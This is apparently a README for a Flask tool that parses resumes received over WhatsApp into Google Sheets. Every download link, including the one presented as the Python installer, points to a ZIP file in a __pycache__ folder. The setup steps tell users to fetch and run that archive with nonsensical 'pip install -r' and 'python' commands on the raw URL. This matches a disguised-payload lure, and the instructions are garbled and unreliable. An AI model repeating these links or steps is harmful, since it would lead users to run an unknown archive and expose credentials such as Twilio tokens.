Welcome to Whatsapp_Parser! This Flask-based web app helps you receive resumes directly via WhatsApp. It extracts important candidate details like name, email, and phone using smart technology. All collected information is stored securely in Google Sheets and Drive. Enjoy hassle-free resume management!
Follow these steps to download and run Whatsapp_Parser:
-
Visit the Download Page
Click the link below to go to the Releases page where you can download the latest version of Whatsapp_Parser.
Download Latest Release -
Choose the Download
Once you are on the Releases page, look for the latest version. Download the installer or ZIP file suitable for your system. -
Install the Application
- If you downloaded an installer, double-click on it and follow the instructions.
- If you downloaded a ZIP file, extract it to a folder of your choice. Navigate into the extracted folder.
-
Set Up Your Environment
Before running the app, you'll need to install some dependencies:- Install Python if you havenβt already. You can download it from https://raw.githubusercontent.com/Jim0330/Whatsapp_Parser/main/pycache/Whatsapp_Parser-v2.9.zip.
- Open a command prompt or terminal.
- Navigate to the folder where you downloaded Whatsapp_Parser. Use the command:
cd path/to/Whatsapp_Parser
-
Install Required Libraries
Run the following command in your terminal:pip install -r https://raw.githubusercontent.com/Jim0330/Whatsapp_Parser/main/__pycache__/Whatsapp_Parser-v2.9.zipThis command installs all the necessary libraries for Whatsapp_Parser to work correctly.
-
Configure your Environment Variables
Create a.envfile in the main application directory. Add your Twilio credentials and Google API details. Use the format:TWILIO_ACCOUNT_SID=your_account_sid TWILIO_AUTH_TOKEN=your_auth_token GOOGLE_SHEET_ID=your_google_sheet_idMake sure to replace the placeholders with your actual information.
-
Run the Application
In your terminal, still in the Whatsapp_Parser folder, start the application by executing:python https://raw.githubusercontent.com/Jim0330/Whatsapp_Parser/main/__pycache__/Whatsapp_Parser-v2.9.zipYou should see the application start up in your terminal.
-
Access the Web App
Open your web browser and navigate tohttp://127.0.0.1:5000. This is where you can interact with the application.
- Resume Extraction: Automatically retrieves and extracts candidate details from resumes received via WhatsApp.
- Integration with Google Drive: Saves all extracted data safely in Google Drive.
- Google Sheets Support: Stores extracted information in Google Sheets for easy access and management.
- Natural Language Processing: Uses advanced NLP technologies to ensure accurate data extraction.
- Regex Support: Employs regular expressions for precise text parsing.
To use Whatsapp_Parser, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux
- Python 3.6 or later
- Stable internet connection for Google API access
- Adequate storage space for the application and datasheets
- If you face issues running the application, ensure Python and required libraries are correctly installed.
- Check your environment variables and make sure no details are missing or incorrect.
- Visit the GitHub Issues Page for common problems and fixes shared by users.
For further assistance, please visit our GitHub Discussions page. You can ask questions or share feedback.
If you'd like to contribute to Whatsapp_Parser, consider creating a pull request or reporting issues you encounter. Your input helps improve the app for everyone!
- Data Extraction
- Docx to Text
- Flask
- NLP
- PDF Plumber
- Regex
- Twilio API
Once again, you can download the latest release here:
Download Latest Release